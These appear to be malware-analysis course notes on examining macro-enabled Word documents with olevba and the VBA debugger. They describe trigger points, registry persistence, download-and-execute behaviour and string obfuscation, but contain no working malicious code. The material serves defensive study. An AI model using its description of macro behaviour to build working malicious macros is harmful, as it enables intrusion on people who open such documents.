Analyzing Macro Code in Office Documents

Tools Used:

  1. Oletools (OLEVBA): A Python-based suite of tools used to analyze and extract VBA source code from Office documents.

  2. Microsoft Word: Used to debug macro code through the VBA Developer Tools.

Steps for Analyzing Macro-Enabled Documents:

  1. Initial Setup:

    • Revert the VM Snapshot, copy the course files, and run Fakenet.

    • Open the command prompt in the folder where the sample document is located.

  2. Static Analysis with OLEVBA:

    • Execute the command olevba re_test_dlx.doc to analyze the document.

    • OLEVBA provides a summary of the analysis, including potential trigger points such as Auto_Open and Document_Open.

    • Redirect the output to a text file for easier navigation: olevba re_test_dlx.doc > olevba_result.txt.

    • Key Points to Analyze:

      • Focus on trigger points like Auto_Open and Document_Open.

      • Inspect the code for functions like MsgBox (displays a message), internet connections, registry modifications, and file executions.

  3. Understanding the Macro Code:

    • Analyze the flow of the macro:

      • The macro might display a message, connect to the internet, create a registry entry, and finally execute a file.

    • Pay attention to the usage of functions like RegWrite (registry modification) and Shell (command execution).

    • Look for obfuscation techniques like the use of avg function, which may indicate encrypted or encoded strings.

  4. Dynamic Analysis with Microsoft Word:

    • Open the document in Microsoft Word (e.g., Word 2013).

    • Setting Breakpoints:

      • Use Alt + F11 to open the VBA Developer Window.

      • Navigate to the Document_Open subroutine and add an End function to prevent immediate execution of the macro.

      • Set a breakpoint at the first line of the subroutine.

    • Debugging:

      • Enable macro content in the Word document to trigger execution.

      • Return to the VBA editor and step through the code using F8.

      • Skip decrypting functions if not needed using Shift + F8, but it's essential to understand the decryption algorithm.

      • Use the Watch Window to monitor variables and expressions, especially to observe decrypted text or key indicators of compromise (IOCs).

  5. Key Observations:

    • Identify network activity, such as GET requests and the corresponding URLs.

    • Detect the creation of persistent mechanisms (e.g., writing to the registry).

    • Observe any execution of downloaded or created files, such as badfile.exe.

Summary:

  • OLEVBA is used for static analysis, helping to identify key functions and trigger points within the macro code.

  • Microsoft Word's VBA Editor is essential for dynamic analysis, allowing step-by-step debugging to understand the macro's behavior fully.

  • Key techniques include setting breakpoints, skipping unnecessary decryption steps, and using the Watch Window to monitor variables and expressions.

These notes cover the fundamental steps and observations when analyzing macro-enabled Word documents for potential malicious activity.

PreviousAnalyzing JavaScript in HTMLNextSetting Up REMnux Environment

Last updated